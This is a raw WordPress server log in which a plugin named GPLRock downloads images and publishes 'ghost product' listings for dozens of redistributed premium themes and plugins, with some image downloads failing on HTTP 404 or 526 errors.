UTC] GPLRock: Image downloaded successfully for product oceanwp-woo-popup (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-707a0664.jpg [04-Apr-2026 16:25:53 UTC] GPLRock: Using pre-downloaded image for product oceanwp-woo-popup: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-707a0664.jpg [04-Apr-2026 16:25:53 UTC] GPLRock: Ghost product published with image - Product ID: oceanwp-woo-popup [04-Apr-2026 16:31:13 UTC] GPLRock: Image downloaded successfully for product facetwp-map-facet (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-594e4412.jpg [04-Apr-2026 16:31:13 UTC] GPLRock: Using pre-downloaded image for product facetwp-map-facet: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-594e4412.jpg [04-Apr-2026 16:31:13 UTC] GPLRock: Ghost product published with image - Product ID: facetwp-map-facet [04-Apr-2026 16:31:14 UTC] GPLRock: Image downloaded successfully for product wordpress-multilingual-woocommerce-gateways-country-limiter-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d72e4bd6.jpg [04-Apr-2026 16:31:14 UTC] GPLRock: Using pre-downloaded image for product wordpress-multilingual-woocommerce-gateways-country-limiter-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d72e4bd6.jpg [04-Apr-2026 16:31:14 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-multilingual-woocommerce-gateways-country-limiter-add-on [04-Apr-2026 16:31:16 UTC] GPLRock: Image downloaded successfully for product woocommerce-brands (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e1bb84f2.jpg [04-Apr-2026 16:31:16 UTC] GPLRock: Using pre-downloaded image for product woocommerce-brands: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e1bb84f2.jpg [04-Apr-2026 16:31:16 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-brands [04-Apr-2026 16:43:57 UTC] GPLRock: Image downloaded successfully for product vlog-video-blog-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d7598253.jpg [04-Apr-2026 16:43:57 UTC] GPLRock: Using pre-downloaded image for product vlog-video-blog-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d7598253.jpg [04-Apr-2026 16:43:57 UTC] GPLRock: Ghost product published with image - Product ID: vlog-video-blog-magazine-wordpress-theme [04-Apr-2026 16:43:59 UTC] GPLRock: Image downloaded successfully for product soflyy-wp-all-import-pro-user-import-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c619c6cc.jpg [04-Apr-2026 16:43:59 UTC] GPLRock: Using pre-downloaded image for product soflyy-wp-all-import-pro-user-import-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c619c6cc.jpg [04-Apr-2026 16:43:59 UTC] GPLRock: Ghost product published with image - Product ID: soflyy-wp-all-import-pro-user-import-addon [04-Apr-2026 16:44:00 UTC] GPLRock: Image downloaded successfully for product wp-job-manager-applications-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-05193b38.jpg [04-Apr-2026 16:44:00 UTC] GPLRock: Using pre-downloaded image for product wp-job-manager-applications-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-05193b38.jpg [04-Apr-2026 16:44:00 UTC] GPLRock: Ghost product published with image - Product ID: wp-job-manager-applications-addon [04-Apr-2026 16:44:02 UTC] GPLRock: Image downloaded successfully for product bookshop-storefront-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e68e0898.jpg [04-Apr-2026 16:44:02 UTC] GPLRock: Using pre-downloaded image for product bookshop-storefront-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e68e0898.jpg [04-Apr-2026 16:44:02 UTC] GPLRock: Ghost product published with image - Product ID: bookshop-storefront-woocommerce-theme [04-Apr-2026 16:44:04 UTC] GPLRock: Image downloaded successfully for product adiva-ecommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-919934ad.jpg [04-Apr-2026 16:44:04 UTC] GPLRock: Using pre-downloaded image for product adiva-ecommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-919934ad.jpg [04-Apr-2026 16:44:04 UTC] GPLRock: Ghost product published with image - Product ID: adiva-ecommerce-wordpress-theme [04-Apr-2026 16:44:05 UTC] GPLRock: Image downloaded successfully for product wp-rentals-booking-accommodation-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-032dee51.jpg [04-Apr-2026 16:44:05 UTC] GPLRock: Using pre-downloaded image for product wp-rentals-booking-accommodation-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-032dee51.jpg [04-Apr-2026 16:44:05 UTC] GPLRock: Ghost product published with image - Product ID: wp-rentals-booking-accommodation-wordpress-theme [04-Apr-2026 16:44:07 UTC] GPLRock: Image downloaded successfully for product monsterinsights-google-optimize-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-005d3073.jpg [04-Apr-2026 16:44:07 UTC] GPLRock: Using pre-downloaded image for product monsterinsights-google-optimize-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-005d3073.jpg [04-Apr-2026 16:44:07 UTC] GPLRock: Ghost product published with image - Product ID: monsterinsights-google-optimize-addon [04-Apr-2026 16:44:09 UTC] GPLRock: Image downloaded successfully for product jobsearch-wp-job-board-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-894c70db.jpg [04-Apr-2026 16:44:09 UTC] GPLRock: Using pre-downloaded image for product jobsearch-wp-job-board-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-894c70db.jpg [04-Apr-2026 16:44:09 UTC] GPLRock: Ghost product published with image - Product ID: jobsearch-wp-job-board-wordpress-plugin [04-Apr-2026 16:44:10 UTC] GPLRock: Image downloaded successfully for product yith-advanced-refund-system-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-63009d32.jpg [04-Apr-2026 16:44:10 UTC] GPLRock: Using pre-downloaded image for product yith-advanced-refund-system-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-63009d32.jpg [04-Apr-2026 16:44:10 UTC] GPLRock: Ghost product published with image - Product ID: yith-advanced-refund-system-for-woocommerce-premium [04-Apr-2026 16:44:12 UTC] GPLRock: Image downloaded successfully for product video-gallery-wordpress-plugin-w-youtube-vimeo-facebook-pages (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dedf8efa.jpg [04-Apr-2026 16:44:12 UTC] GPLRock: Using pre-downloaded image for product video-gallery-wordpress-plugin-w-youtube-vimeo-facebook-pages: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dedf8efa.jpg [04-Apr-2026 16:44:12 UTC] GPLRock: Ghost product published with image - Product ID: video-gallery-wordpress-plugin-w-youtube-vimeo-facebook-pages [04-Apr-2026 17:16:09 UTC] GPLRock: Image downloaded successfully for product formidable-forms-zapier (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-96eef537.jpg [04-Apr-2026 17:16:09 UTC] GPLRock: Using pre-downloaded image for product formidable-forms-zapier: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-96eef537.jpg [04-Apr-2026 17:16:09 UTC] GPLRock: Ghost product published with image - Product ID: formidable-forms-zapier [04-Apr-2026 17:16:10 UTC] GPLRock: Image downloaded successfully for product css-igniter-philoxenia-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0840bc11.jpg [04-Apr-2026 17:16:11 UTC] GPLRock: Using pre-downloaded image for product css-igniter-philoxenia-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0840bc11.jpg [04-Apr-2026 17:16:11 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-philoxenia-wordpress-theme [04-Apr-2026 17:16:12 UTC] GPLRock: Image downloaded successfully for product chatbot-for-woocommerce-retargeting-exit-intent-abandoned-cart-facebook-live-chat-woowbot (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2f84b571.jpg [04-Apr-2026 17:16:12 UTC] GPLRock: Using pre-downloaded image for product chatbot-for-woocommerce-retargeting-exit-intent-abandoned-cart-facebook-live-chat-woowbot: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2f84b571.jpg [04-Apr-2026 17:16:12 UTC] GPLRock: Ghost product published with image - Product ID: chatbot-for-woocommerce-retargeting-exit-intent-abandoned-cart-facebook-live-chat-woowbot [04-Apr-2026 17:16:14 UTC] GPLRock: Image downloaded successfully for product woocommerce-perfect-seo-url (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-80b2d0d7.jpg [04-Apr-2026 17:16:14 UTC] GPLRock: Using pre-downloaded image for product woocommerce-perfect-seo-url: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-80b2d0d7.jpg [04-Apr-2026 17:16:14 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-perfect-seo-url [04-Apr-2026 17:16:16 UTC] GPLRock: Image downloaded successfully for product monsterinsights-ads-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-af589043.jpg [04-Apr-2026 17:16:16 UTC] GPLRock: Using pre-downloaded image for product monsterinsights-ads-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-af589043.jpg [04-Apr-2026 17:16:16 UTC] GPLRock: Ghost product published with image - Product ID: monsterinsights-ads-addon [04-Apr-2026 17:16:18 UTC] GPLRock: Image downloaded successfully for product ultimate-tweaker-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f73248ac.jpg [04-Apr-2026 17:16:18 UTC] GPLRock: Using pre-downloaded image for product ultimate-tweaker-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f73248ac.jpg [04-Apr-2026 17:16:18 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-tweaker-for-wordpress [04-Apr-2026 17:16:19 UTC] GPLRock: Image downloaded successfully for product ninja-forms-emailoctopus (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d373b1d6.jpg [04-Apr-2026 17:16:19 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-emailoctopus: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d373b1d6.jpg [04-Apr-2026 17:16:19 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-emailoctopus [04-Apr-2026 17:16:21 UTC] GPLRock: Image downloaded successfully for product envira-gallery-social-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8ef959a1.jpg [04-Apr-2026 17:16:21 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-social-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8ef959a1.jpg [04-Apr-2026 17:16:21 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-social-addon [04-Apr-2026 17:16:22 UTC] GPLRock: Image downloaded successfully for product wp-portfolio (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a68ead30.jpg [04-Apr-2026 17:16:22 UTC] GPLRock: Using pre-downloaded image for product wp-portfolio: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a68ead30.jpg [04-Apr-2026 17:16:22 UTC] GPLRock: Ghost product published with image - Product ID: wp-portfolio [04-Apr-2026 17:16:24 UTC] GPLRock: Image downloaded successfully for product ninja-forms-emma (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7f91a87d.jpg [04-Apr-2026 17:16:24 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-emma: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7f91a87d.jpg [04-Apr-2026 17:16:24 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-emma [04-Apr-2026 17:22:47 UTC] GPLRock: Image downloaded successfully for product search-go-smart-directory-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bf8d81a4.jpg [04-Apr-2026 17:22:47 UTC] GPLRock: Using pre-downloaded image for product search-go-smart-directory-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bf8d81a4.jpg [04-Apr-2026 17:22:47 UTC] GPLRock: Ghost product published with image - Product ID: search-go-smart-directory-theme [04-Apr-2026 17:22:49 UTC] GPLRock: Image downloaded successfully for product woocommerce-give-products (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fd9134f5.jpg [04-Apr-2026 17:22:49 UTC] GPLRock: Using pre-downloaded image for product woocommerce-give-products: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fd9134f5.jpg [04-Apr-2026 17:22:49 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-give-products [04-Apr-2026 17:22:51 UTC] GPLRock: Image downloaded successfully for product galaxy-funder-woocommerce-crowdfunding-system (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cab0e8fb.jpg [04-Apr-2026 17:22:51 UTC] GPLRock: Using pre-downloaded image for product galaxy-funder-woocommerce-crowdfunding-system: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cab0e8fb.jpg [04-Apr-2026 17:22:51 UTC] GPLRock: Ghost product published with image - Product ID: galaxy-funder-woocommerce-crowdfunding-system [04-Apr-2026 17:22:52 UTC] GPLRock: Image downloaded successfully for product elmastudio-moka-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb47b3c6.jpg [04-Apr-2026 17:22:52 UTC] GPLRock: Using pre-downloaded image for product elmastudio-moka-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb47b3c6.jpg [04-Apr-2026 17:22:52 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-moka-wordpress-theme [04-Apr-2026 17:22:55 UTC] GPLRock: Image download failed for product pharmacy-storefront-woocommerce-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 17:22:59 UTC] GPLRock: Image download failed for product pharmacy-storefront-woocommerce-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 17:23:04 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/Pharmacy-Storefront-WooCommerce-Theme.jpg for product pharmacy-storefront-woocommerce-theme after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 17:23:06 UTC] GPLRock: Image download failed for product pharmacy-storefront-woocommerce-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 17:23:10 UTC] GPLRock: Image download failed for product pharmacy-storefront-woocommerce-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 17:23:14 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/Pharmacy-Storefront-WooCommerce-Theme.jpg for product pharmacy-storefront-woocommerce-theme after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 17:23:14 UTC] GPLRock WARNING: Image download failed for product pharmacy-storefront-woocommerce-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/09/Pharmacy-Storefront-WooCommerce-Theme.jpg [04-Apr-2026 17:23:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pharmacy-storefront-woocommerce-theme [04-Apr-2026 17:23:16 UTC] GPLRock: Image downloaded successfully for product devicer-electronics-mobile-tech-store (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-412d215d.jpg [04-Apr-2026 17:23:16 UTC] GPLRock: Using pre-downloaded image for product devicer-electronics-mobile-tech-store: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-412d215d.jpg [04-Apr-2026 17:23:16 UTC] GPLRock: Ghost product published with image - Product ID: devicer-electronics-mobile-tech-store [04-Apr-2026 17:23:18 UTC] GPLRock: Image downloaded successfully for product yith-desire-sexy-shop-an-intriguing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-923f7112.jpg [04-Apr-2026 17:23:18 UTC] GPLRock: Using pre-downloaded image for product yith-desire-sexy-shop-an-intriguing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-923f7112.jpg [04-Apr-2026 17:23:18 UTC] GPLRock: Ghost product published with image - Product ID: yith-desire-sexy-shop-an-intriguing-wordpress-theme [04-Apr-2026 17:23:20 UTC] GPLRock: Image downloaded successfully for product woocommerce-request-a-quote (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0b98f462.jpg [04-Apr-2026 17:23:20 UTC] GPLRock: Using pre-downloaded image for product woocommerce-request-a-quote: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0b98f462.jpg [04-Apr-2026 17:23:20 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-request-a-quote [04-Apr-2026 17:23:21 UTC] GPLRock: Image downloaded successfully for product intense-shortcodes-and-site-builder-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8147ddb7.jpg [04-Apr-2026 17:23:22 UTC] GPLRock: Using pre-downloaded image for product intense-shortcodes-and-site-builder-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8147ddb7.jpg [04-Apr-2026 17:23:22 UTC] GPLRock: Ghost product published with image - Product ID: intense-shortcodes-and-site-builder-for-wordpress [04-Apr-2026 17:23:23 UTC] GPLRock: Image downloaded successfully for product themify-builder-timeline-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1849f313.jpg [04-Apr-2026 17:23:23 UTC] GPLRock: Using pre-downloaded image for product themify-builder-timeline-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1849f313.jpg [04-Apr-2026 17:23:23 UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-timeline-addon [04-Apr-2026 17:24:52 UTC] GPLRock: Image download failed for product woocommerce-composite-products-woocommerce-product-bundles (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:24:54 UTC] GPLRock: Image download failed for product woocommerce-composite-products-woocommerce-product-bundles (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:24:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-composite-products--woocommerce-product-bundles-8344.webp for product woocommerce-composite-products-woocommerce-product-bundles after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:24:57 UTC] GPLRock: Image download failed for product woocommerce-composite-products-woocommerce-product-bundles (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:24:59 UTC] GPLRock: Image download failed for product woocommerce-composite-products-woocommerce-product-bundles (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-composite-products--woocommerce-product-bundles-8344.webp for product woocommerce-composite-products-woocommerce-product-bundles after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:25:01 UTC] GPLRock WARNING: Image download failed for product woocommerce-composite-products-woocommerce-product-bundles. URL: https://meldwp.com/wp-content/uploads/woocommerce-composite-products--woocommerce-product-bundles-8344.webp [04-Apr-2026 17:25:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-composite-products-woocommerce-product-bundles [04-Apr-2026 17:25:01 UTC] GPLRock: Image download failed for product webviewgold-for-ios-convert-website-to-ios-app-no-code-push-url-handling-much-more (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:03 UTC] GPLRock: Image download failed for product webviewgold-for-ios-convert-website-to-ios-app-no-code-push-url-handling-much-more (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/webviewgold-for-ios--convert-website-to-ios-app--no-code-push-url-handling--much-17298.webp for product webviewgold-for-ios-convert-website-to-ios-app-no-code-push-url-handling-much-more after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:25:05 UTC] GPLRock: Image download failed for product webviewgold-for-ios-convert-website-to-ios-app-no-code-push-url-handling-much-more (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:07 UTC] GPLRock: Image download failed for product webviewgold-for-ios-convert-website-to-ios-app-no-code-push-url-handling-much-more (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/webviewgold-for-ios--convert-website-to-ios-app--no-code-push-url-handling--much-17298.webp for product webviewgold-for-ios-convert-website-to-ios-app-no-code-push-url-handling-much-more after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:25:09 UTC] GPLRock WARNING: Image download failed for product webviewgold-for-ios-convert-website-to-ios-app-no-code-push-url-handling-much-more. URL: https://meldwp.com/wp-content/uploads/webviewgold-for-ios--convert-website-to-ios-app--no-code-push-url-handling--much-17298.webp [04-Apr-2026 17:25:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: webviewgold-for-ios-convert-website-to-ios-app-no-code-push-url-handling-much-more [04-Apr-2026 17:25:10 UTC] GPLRock: Image download failed for product eclassify-classified-ads-buy-and-sell-marketplace-flutter-app-with-laravel-admin-panel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:12 UTC] GPLRock: Image download failed for product eclassify-classified-ads-buy-and-sell-marketplace-flutter-app-with-laravel-admin-panel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eclassify---classified-ads-buy-and-sell-marketplace-flutter-app-with-laravel-adm-11547.webp for product eclassify-classified-ads-buy-and-sell-marketplace-flutter-app-with-laravel-admin-panel after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:25:14 UTC] GPLRock: Image download failed for product eclassify-classified-ads-buy-and-sell-marketplace-flutter-app-with-laravel-admin-panel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:16 UTC] GPLRock: Image download failed for product eclassify-classified-ads-buy-and-sell-marketplace-flutter-app-with-laravel-admin-panel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eclassify---classified-ads-buy-and-sell-marketplace-flutter-app-with-laravel-adm-11547.webp for product eclassify-classified-ads-buy-and-sell-marketplace-flutter-app-with-laravel-admin-panel after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:25:18 UTC] GPLRock WARNING: Image download failed for product eclassify-classified-ads-buy-and-sell-marketplace-flutter-app-with-laravel-admin-panel. URL: https://meldwp.com/wp-content/uploads/eclassify---classified-ads-buy-and-sell-marketplace-flutter-app-with-laravel-adm-11547.webp [04-Apr-2026 17:25:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eclassify-classified-ads-buy-and-sell-marketplace-flutter-app-with-laravel-admin-panel [04-Apr-2026 17:25:18 UTC] GPLRock: Image download failed for product lifeline-donation-pro-wordpress-plugin-to-get-donations (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:20 UTC] GPLRock: Image download failed for product lifeline-donation-pro-wordpress-plugin-to-get-donations (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lifeline-donation-pro---wordpress-plugin-to-get-donations-28635.webp for product lifeline-donation-pro-wordpress-plugin-to-get-donations after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:25:23 UTC] GPLRock: Image download failed for product lifeline-donation-pro-wordpress-plugin-to-get-donations (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:25 UTC] GPLRock: Image download failed for product lifeline-donation-pro-wordpress-plugin-to-get-donations (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lifeline-donation-pro---wordpress-plugin-to-get-donations-28635.webp for product lifeline-donation-pro-wordpress-plugin-to-get-donations after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:25:27 UTC] GPLRock WARNING: Image download failed for product lifeline-donation-pro-wordpress-plugin-to-get-donations. URL: https://meldwp.com/wp-content/uploads/lifeline-donation-pro---wordpress-plugin-to-get-donations-28635.webp [04-Apr-2026 17:25:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lifeline-donation-pro-wordpress-plugin-to-get-donations [04-Apr-2026 17:25:27 UTC] GPLRock: Image download failed for product custom-fields-options-plugin-for-wordpress-xbox-framework (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:29 UTC] GPLRock: Image download failed for product custom-fields-options-plugin-for-wordpress-xbox-framework (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-fields--options-plugin-for-wordpress---xbox-framework-1778.webp for product custom-fields-options-plugin-for-wordpress-xbox-framework after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:25:31 UTC] GPLRock: Image download failed for product custom-fields-options-plugin-for-wordpress-xbox-framework (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:33 UTC] GPLRock: Image download failed for product custom-fields-options-plugin-for-wordpress-xbox-framework (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-fields--options-plugin-for-wordpress---xbox-framework-1778.webp for product custom-fields-options-plugin-for-wordpress-xbox-framework after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:25:36 UTC] GPLRock WARNING: Image download failed for product custom-fields-options-plugin-for-wordpress-xbox-framework. URL: https://meldwp.com/wp-content/uploads/custom-fields--options-plugin-for-wordpress---xbox-framework-1778.webp [04-Apr-2026 17:25:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: custom-fields-options-plugin-for-wordpress-xbox-framework [04-Apr-2026 17:25:36 UTC] GPLRock: Image downloaded successfully for product wildcard-coupons-woocommerce-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d2b1c00.webp [04-Apr-2026 17:25:36 UTC] GPLRock: Using pre-downloaded image for product wildcard-coupons-woocommerce-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d2b1c00.webp [04-Apr-2026 17:25:36 UTC] GPLRock: Ghost product published with image - Product ID: wildcard-coupons-woocommerce-plugin [04-Apr-2026 17:25:36 UTC] GPLRock: Image download failed for product animated-heading-addon-widget-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:38 UTC] GPLRock: Image download failed for product animated-heading-addon-widget-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/animated-heading-addon--widget-for-elementor-21325.webp for product animated-heading-addon-widget-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:25:40 UTC] GPLRock: Image download failed for product animated-heading-addon-widget-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:42 UTC] GPLRock: 